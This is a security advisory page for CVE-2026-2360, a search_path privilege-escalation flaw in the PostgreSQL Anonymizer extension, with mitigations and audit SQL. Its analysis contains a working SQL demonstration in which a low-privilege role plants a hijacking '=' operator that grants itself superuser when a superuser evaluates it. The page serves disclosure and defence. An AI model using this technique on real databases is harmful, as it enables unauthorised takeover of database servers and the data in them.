
CVE-2026-2360: Uncontrolled Search Path Element in DALIBO PostgreSQL Anonymizer

Severity: High
Published: Wed Feb 11 2026 (02/11/2026, 17:47:55 UTC)
Source: CVE Database V5
Vendor/Project: DALIBO
Product: PostgreSQL Anonymizer

Description

PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and placing malicious code in that operator. This operator will later be executed with superuser privileges when the extension is created. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreSQL 15 and later, the creation permission on the public schema is revoked by default and this exploit can only be achieved if a superuser adds a new schema in her/his own search_path and grants the CREATE privilege on that schema to untrusted users, both actions being clearly discouraged by the PostgreSQL documentation. The problem is resolved in PostgreSQL Anonymizer 3.0.1 and further versions.

AI-Powered Analysis

Last updated: 02/11/2026, 18:30:45 UTC

Technical Analysis

CVE-2026-2360 affects releases of the DALIBO PostgreSQL Anonymizer extension before 3.0.1 (the CVE record lists the affected version only as "1"). It is an uncontrolled search path element, the class catalogued as CWE-427: during extension creation an operator is resolved through the session search_path rather than by a schema-qualified name, so any role that can CREATE in a schema on the installing superuser's search_path can plant a same-named operator there, bound to a function whose body the attacker controls. When the superuser runs CREATE EXTENSION, operator resolution selects the planted operator and its function executes with the superuser's privileges. Superuser-level SQL on PostgreSQL amounts to full control of the database cluster: the attacker can make its own role a superuser, read or alter every table, and run operating-system commands as the server's service account through server-side COPY. The exposure is greatest on PostgreSQL 14, and on any database upgraded from 14 or earlier, because there the public schema still grants CREATE to every role by default. PostgreSQL 15 and later revoke that default grant on newly created databases, so the bug is reachable only if a superuser has added to its own search_path a schema in which untrusted roles hold CREATE, which the PostgreSQL documentation advises against. A server major-version upgrade (pg_upgrade or dump and restore) does not rewrite existing schema ACLs, so a 15.x cluster migrated from 14 carries the old grant with it. Confidentiality, integrity and availability are all fully affected. The issue is fixed in PostgreSQL Anonymizer 3.0.1 and later; this page does not detail the change, but the established remediation for this bug class is to schema-qualify every operator and function reference in the extension's SQL and to pin search_path inside its functions, which is why the fix is an extension upgrade rather than a server setting. The CVSS v3.1 base score is 8.0 (High); the recorded vector requires an existing privileged database role but no user interaction. In practice the privilege that matters is CREATE on a schema the superuser searches, which on a default PostgreSQL 14 database every role already holds on public. No exploitation in the wild had been reported at the time of this entry.
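The mechanism, shown end to end. The block below is an added demonstration of the bug class on a throwaway cluster; it is not code from PostgreSQL Anonymizer, from DALIBO, or from the CVE record. The role name lowpriv, the function name hijack_eq and the final SELECT that stands in for the extension's privileged install step are all constructed. The advisory does not say which operator the extension resolves unqualified, so the example shadows a text = varchar comparison, chosen because pg_catalog has no operator with that exact signature and an exact match in any searched schema wins under PostgreSQL's operator-resolution rules.

```sql
-- Constructed demonstration of the search_path hijack described above.
-- NOT code from PostgreSQL Anonymizer. The "install step" in part 3 is a
-- stand-in for whatever privileged statement evaluates an unqualified
-- operator. Run on a disposable PostgreSQL 14 cluster, or any database
-- where PUBLIC still holds CREATE on schema public.

-- 1. Setup, as a superuser: an ordinary role with no special privileges.
CREATE ROLE lowpriv LOGIN PASSWORD 'lowpriv';      -- constructed test role

-- 2. As lowpriv (psql -U lowpriv): plant the operator in public.
--    CREATE on public is the only privilege needed; plpgsql is a trusted
--    language usable by every role. The function is SECURITY INVOKER (the
--    default), so its body runs as whoever evaluates the operator.
CREATE FUNCTION public.hijack_eq(l text, r varchar) RETURNS boolean
LANGUAGE plpgsql AS $$
BEGIN
    -- Payload fires only when a superuser evaluates the operator, so an
    -- ordinary caller sees nothing unusual.
    IF (SELECT rolsuper FROM pg_roles WHERE rolname = current_user) THEN
        EXECUTE 'ALTER ROLE lowpriv SUPERUSER';
    END IF;
    RETURN l = r::text;   -- otherwise behave exactly like a normal "="
END;
$$;

-- pg_catalog defines "=" for (text, text) but not for (text, varchar).
-- An exact-signature match in a searched schema beats the built-in that
-- needs an implicit cast, so every unqualified `text = varchar` evaluated
-- by a role whose search_path contains public now lands here.
CREATE OPERATOR public.= (
    LEFTARG  = text,
    RIGHTARG = varchar,
    FUNCTION = public.hijack_eq
);

-- 3. As the superuser, with the default search_path ("$user", public):
--    stand-in for the privileged install step. The comparison is not
--    schema-qualified, so operator resolution picks the planted "=".
SELECT 'anon'::text = 'anon'::varchar AS install_check;

-- 4. Confirm the escalation: rolsuper is now true for lowpriv.
SELECT rolname, rolsuper FROM pg_roles WHERE rolname = 'lowpriv';

-- Hardened form of the same comparison: name the schema, so search_path
-- is never consulted. The alternative for a whole script is
-- SET LOCAL search_path = pg_catalog; at its top.
SELECT 'anon'::text OPERATOR(pg_catalog.=) 'anon'::varchar AS safe_check;
```

The only thing the attacker needs is CREATE on a schema the superuser searches; no existing privilege on the extension, on the target superuser's role, or on any table is involved. That is why the PostgreSQL 15 change to the public schema's default ACL removes the easy path, and why a schema ACL copied forward from an older cluster reopens it.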

Potential Impact

For European organizations, this vulnerability could lead to complete compromise of PostgreSQL database servers running an affected PostgreSQL Anonymizer release (before 3.0.1), especially on PostgreSQL 14 or on databases upgraded from 14 or earlier. An attacker who obtains superuser privileges could exfiltrate sensitive data, alter or destroy it, disrupt availability, and, because a superuser can execute commands as the server's operating-system account, pivot to other internal systems. This is particularly critical for sectors with stringent data protection requirements such as finance, healthcare, and government institutions across Europe. Arbitrary code execution with superuser privileges also undermines the anonymization process itself: the extension exists to protect personal data, and a superuser can read the original values it was meant to mask. The impact is greater in multi-tenant environments or cloud-hosted PostgreSQL instances, where the boundary between a tenant's role and the administrator is the only isolation. Organizations that run PostgreSQL 15 or later but carry a permissive public-schema ACL forward from an older cluster, or that have granted CREATE on a searched schema to untrusted roles, remain at risk. The absence of known exploitation in the wild suggests limited immediate threat but does not reduce the severity if the conditions are present.

Mitigation Recommendations

- Upgrade PostgreSQL Anonymizer to 3.0.1 or later. Extensions are installed per database, so update the extension object in every database that carries it, not only the package on the host, and run the update from a session whose search_path contains no schema that untrusted roles can write to.
- On PostgreSQL 14, and on any database upgraded from 14 or earlier, revoke the CREATE privilege that PUBLIC holds on the public schema. This is the PostgreSQL 15 default for new databases, and it has to be applied per database because schema ACLs are per database.
- Before any superuser runs CREATE EXTENSION or an extension update, inspect every schema on that superuser's search_path for operators and functions owned by non-superusers. Upgrading the extension does not remove an operator an attacker has already planted, and such an object can still hijack any other unqualified reference evaluated from a privileged session.
- Never grant CREATE on a schema that appears in a superuser's search_path to untrusted roles, and keep the search_path of superuser and administrative roles free of schemas shared with application users.
- Enable DDL logging (PostgreSQL's log_statement = 'ddl') and alert on CREATE OPERATOR or CREATE FUNCTION in shared schemas by roles that have no business defining objects there.
- Audit roles and schema privileges regularly to catch drift back toward permissive defaults.
- Isolate critical databases with network segmentation to limit who can reach them at all, and keep tested backups so that a compromise can be recovered from.
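The checks and hardening steps above, as SQL. This is an added example, not material from the PostgreSQL Anonymizer project or the CVE record. It assumes a superuser session connected to the database being audited; the extension name anon in the final template is the project's documented name and is not stated on this page, and the other identifiers are PostgreSQL system catalogs and functions.

```sql
-- Constructed audit and hardening statements for the conditions described
-- in this entry. Not from the PostgreSQL Anonymizer project. Run them as a
-- superuser, connected to each database in turn: schema privileges,
-- operators and extensions are all per-database objects.

-- 1. Precondition check. true means every role may create objects in
--    public, the PostgreSQL 14 default and what a database upgraded from
--    14 or earlier keeps; a fresh PostgreSQL 15+ database returns false.
SELECT has_schema_privilege('public', 'public', 'CREATE') AS public_can_create;

-- 2. Per-role search_path overrides on superusers. Any shared schema that
--    shows up here is a schema an attacker would want CREATE on.
SELECT rolname, rolconfig
FROM pg_roles
WHERE rolsuper AND rolconfig IS NOT NULL;

-- 3. Objects able to shadow a built-in from this session's search_path:
--    operators and functions in a searched schema, owned by a
--    non-superuser, whose name also exists in pg_catalog. Expect no rows.
WITH path AS (
    SELECT nspname, pos
    FROM unnest(current_schemas(false)) WITH ORDINALITY AS p(nspname, pos)
)
SELECT kind, schema, owner, signature
FROM (
    SELECT 'operator' AS kind, n.nspname AS schema, r.rolname AS owner,
           format('%s %s %s', o.oprleft::regtype, o.oprname,
                  o.oprright::regtype) AS signature,
           path.pos
    FROM pg_operator o
    JOIN pg_namespace n ON n.oid = o.oprnamespace
    JOIN path ON path.nspname = n.nspname
    JOIN pg_roles r ON r.oid = o.oprowner
    WHERE NOT r.rolsuper
      AND EXISTS (SELECT 1 FROM pg_operator c
                  WHERE c.oprnamespace = 'pg_catalog'::regnamespace
                    AND c.oprname = o.oprname)
    UNION ALL
    SELECT 'function', n.nspname, r.rolname,
           format('%s(%s)', p.proname,
                  pg_get_function_identity_arguments(p.oid)),
           path.pos
    FROM pg_proc p
    JOIN pg_namespace n ON n.oid = p.pronamespace
    JOIN path ON path.nspname = n.nspname
    JOIN pg_roles r ON r.oid = p.proowner
    WHERE NOT r.rolsuper
      AND EXISTS (SELECT 1 FROM pg_proc c
                  WHERE c.pronamespace = 'pg_catalog'::regnamespace
                    AND c.proname = p.proname)
) AS shadowing
ORDER BY pos, kind, signature;

-- 4. Hardening: apply the PostgreSQL 15 default to an older database, and
--    install or update the extension from a session whose search_path
--    holds nothing an untrusted role can write to. This narrows the attack
--    surface for the whole class; the fix itself is the 3.0.1 upgrade.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
BEGIN;
SET LOCAL search_path = pg_catalog;
-- CREATE EXTENSION anon;          -- or: ALTER EXTENSION anon UPDATE;
COMMIT;
```

Query 3 is deliberately broad: it lists every non-superuser-owned object that shares a name with something in pg_catalog, not only exact signature collisions, because an operator such as the text = varchar case shadows a built-in without sharing its signature. Review the rows rather than deleting blindly; legitimate application code sometimes overloads a catalog name on purpose, and the remedy for those is to schema-qualify the privileged callers.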


Technical Details

Data Version: 5.2
Assigner Short Name: PostgreSQL
Date Reserved: 2026-02-11T17:11:41.119Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 698cc7724b57a58fa1b0b321

Added to database: 2/11/2026, 6:16:18 PM

Last enriched: 2/11/2026, 6:30:45 PM

Last updated: 2/11/2026, 7:19:32 PM

